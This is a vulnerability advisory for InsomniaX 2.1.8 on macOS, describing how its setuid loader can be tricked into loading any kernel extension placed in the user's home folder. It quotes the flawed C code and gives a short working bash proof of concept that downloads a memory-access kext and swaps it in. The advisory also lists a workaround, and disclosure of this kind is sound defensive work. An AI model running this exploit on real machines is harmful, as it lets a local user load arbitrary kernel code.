exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

InsomniaX 2.1.8 Arbitrary Kernel Extension Loading

InsomniaX 2.1.8 Arbitrary Kernel Extension Loading
Posted Jul 3, 2017
Authored by Yorick Koster

It was found that the loader application bundled with InsomniaX can be used to load arbitrary Kernel Extensions (kext). The loader is normally used to load a kext file that is needed to disable the Lid Sleep. A flaw has been found in the loader that allows a local attacker to load (or unload) any arbitrary kext file. Version 2.1.8 is affected.

tags | exploit, arbitrary, kernel, local
SHA-256 | f28199946230e4daa1642242d33d9ca9f4e85aea826651a5cc95372e3d523473

InsomniaX 2.1.8 Arbitrary Kernel Extension Loading

Change Mirror Download
------------------------------------------------------------------------
InsomniaX loader allows loading of arbitrary Kernel Extensions
------------------------------------------------------------------------
Yorick Koster, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the loader application bundled with InsomniaX can be
used to load arbitrary Kernel Extensions (kext). The loader is normally
used to load a kext file that is needed to disable the Lid Sleep. A flaw
has been found in the loader that allows a local attacker to load (or
unload) any arbitrary kext file.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- http://semaja2.net/2017/06/insomniax-security-notice/
- http://semaja2.net/2017/06/thank-you-and-farewell-for-now/

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on InsomniaX version 2.1.8.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available. The author of InsomniaX reports
that InsomniaX is no longer supported. As a workaround, remove the
setuid bit from the loader file. Doing so will prevent users from
disabling the Lid Sleep.

sudo chmod u-s /Applications/InsomniaX.app/Contents/Resources/loader

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170405/insomniax-loader-allows-loading-of-arbitrary-kernel-extensions.html

This issue exists because InsomniaX tries to load the kext file form the user's home folder. When started the loader first changes the owner of the kext file to user root and group wheel. This is required or else the kext loader will refuse to load the kext. After changing the owner, loader will call kextload with the path set to the kext located in the user's home directory. Replacing InsomniaX' kext with a different one will cause the loader to load this kext instead.

struct passwd *pw = getpwuid(getuid());

char *homedir = pw->pw_dir;

char *supportPath = strcat(homedir, "/Library/Application Support/InsomniaX");
const char *kextPath = strcat(supportPath, "/Insomnia_r11.kext");

switch(myCommand->authorizedCommandId)
{
case kMyAuthorizedLoad: {
/* Child code. */
if(fork() == 0) {
#ifdef DEBUG
fprintf(stderr, "CHOWN\n");
#endif
dup2(2,1);
execl("/usr/sbin/chown", "chown", "-R", "root:wheel", kextPath, NULL);
}
/* Parent code. */
else {
wait(&status);
/* Child code. */
if(fork() == 0) {
#ifdef DEBUG
fprintf(stderr, "KEXTLOAD\n");
#endif
dup2(2,1);
execl("/sbin/kextload", "kextload", kextPath, NULL);
}

This issue can be demonstrated using the following steps:

- start InsomniaX
- run the Bash script below
- click on the InsomniaX icon in the menu bar and select Disable Lid Sleep
- run kextstat -l -b com.google.MacPmem to check if the kext is loaded

#!/bin/bash
mv ~/Library/Application\ Support/InsomniaX ~/Library/Application\ Support/InsomniaX.O
mkdir -p ~/Library/Application\ Support/InsomniaX
cd ~/Library/Application\ Support/InsomniaX
curl -L https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip --output osxpmem-2.1.post4.zip
unzip osxpmem-2.1.post4.zip
mv osxpmem.app/MacPmem.kext/ Insomnia_r11.kext


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close